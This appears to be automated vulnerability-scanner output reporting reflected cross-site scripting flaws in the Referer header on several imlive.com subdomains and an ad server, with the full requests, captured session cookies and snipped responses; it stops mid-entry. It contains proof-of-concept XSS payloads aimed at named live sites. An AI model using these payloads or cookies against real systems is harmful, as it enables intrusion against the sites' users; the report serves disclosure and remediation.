Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e45d9'-alert(1)-'4b50bf8581f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c15d'-alert(1)-'545d614c845 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=8c15d'-alert(1)-'545d614c845
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ec0'-alert(1)-'1ca19f61f52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=58ec0'-alert(1)-'1ca19f61f52
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef76'-alert(1)-'7097e4ccd25 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6ef76'-alert(1)-'7097e4ccd25
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 751a4'-alert(1)-'3e6a4981811 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=751a4'-alert(1)-'3e6a4981811
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8655a'-alert(1)-'b1450d4e902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=8655a'-alert(1)-'b1450d4e902
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82729'-alert(1)-'0751f493bff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=82729'-alert(1)-'0751f493bff
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28ad3'-alert(1)-'7c8c16b05d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=28ad3'-alert(1)-'7c8c16b05d7
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a10'-alert(1)-'0b760eb3fe0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=81a10'-alert(1)-'0b760eb3fe0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ec55'-alert(1)-'3deb7da7e95 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=0.14057195745408535 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=9ec55'-alert(1)-'3deb7da7e95 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb266870=5_[r^208WMuF4Lw)IE.8qu]==?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPyqFBR3BpJpcBWHfHSmrEEKwRUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEsAQBAgUCAAIAAAAAHyH9zwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254384%29%3Buf%28%27r%27%2C+151403%2C+1296254384%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2811%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2887%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28619%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28620%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28621%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:45:12 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:45:12 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb266870=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:45:12 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:45:12 GMT Content-Length: 966
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adbd'-alert(1)-'4f9aafda70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=8adbd'-alert(1)-'4f9aafda70b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c53c'-alert(1)-'71f23548084 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GuestDiscountClubs.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=3c53c'-alert(1)-'71f23548084
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:00 GMT Connection: close Content-Length: 40625 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=3c53c'-alert(1)-'71f23548084&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a8e5'><script>alert(1)</script>0a7d7dac8a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /SiteInformation.html HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=7a8e5'><script>alert(1)</script>0a7d7dac8a3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:46 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:46 GMT Connection: close Content-Length: 28320 Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/terminology/&lr=1107816009&ud=0&pe=siteinformation.asp&rf=http://www.google.com/search?hl=en^q=7a8e5'><script>alert(1)</script>0a7d7dac8a3&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fbb'-alert(1)-'f6926b45b35 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /awardarena/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=46fbb'-alert(1)-'f6926b45b35
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:59 GMT Connection: close Content-Length: 24721 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/&rf=http://www.google.com/search?hl=en^q=46fbb'-alert(1)-'f6926b45b35&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f517a'><script>alert(1)</script>7528764405c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /become_celeb.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=f517a'><script>alert(1)</script>7528764405c
Response (redirected)
